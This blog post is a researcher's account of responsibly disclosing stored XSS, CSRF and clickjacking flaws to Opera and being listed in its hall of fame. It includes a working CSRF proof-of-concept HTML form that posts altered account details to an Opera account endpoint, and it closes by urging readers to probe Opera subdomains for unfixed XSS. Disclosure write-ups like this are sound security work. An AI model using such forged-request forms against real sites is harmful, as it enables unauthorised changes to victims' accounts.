Hi, I am Rafay Baloch, a security researcher, author and a public speaker.

Stored XSS, CSRF And Clickjacking Vulnerabilities in Opera



Now a days, I am not much active in bug bounty programs, However, still i wanted to share my experience with Opera, Opera does not have a bug bounty program, However they certainly have their own way of thanking researchers by sending them some swag and listing their name under Hall of fame.

I reported few vulnerabilities to opera including a Stored XSS, CSRF and a clickjacking vulnerability. The POC's for the vulnerabilities are as follows:

Stored XSS 


The "Username" input was not being sanitized properly, Which resulted in an execution of javascript.

CSRF POC

The form was missing with CSRF tokens, An attacker could have used a CSRF attack in order to manipulate the form details.

POC

<html>
  
  <body>
    <form action="https://apps.opera.com/en_pk/account.php?action=details" method="POST">
      <input type="hidden" name="email" value="rafaybaloch&#64;gmail&#46;com" />
      <input type="hidden" name="name" value="Rafay&#32;Baloch" />
      <input type="hidden" name="address1" value="f&#45;10&#44;afasf&#32;afs&#32;asf&#32;1&#44;block&#32;15&#32;near&#32;income&#32;tax&#32;office&#44;asssssss&#45;e&#45;johar" />
      <input type="hidden" name="address2" value="" />
      <input type="hidden" name="city" value="Karachi" />
      <input type="hidden" name="state" value="" />
      <input type="hidden" name="country" value="PK" />
      <input type="hidden" name="zip" value="44000" />
      <input type="hidden" name="phone" value="&#43;923333333333" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

Opera Hall Of Fame

So, For my findings, Opera listed my name under their hall of fame:



Gift from Opera

As a token of appreciation, they also send me the following gifts:


Opera is still sending some good stuff, I would recommend researchers to start looking opera's subdomains for low hanging fruits such as XSS, I know there is a lot of vulnerabilities out there unfixed.
© 2023 All Rights Reserved by RHA Info Sec. Top

Contact Form

Name

Email *

Message *

Powered by Blogger.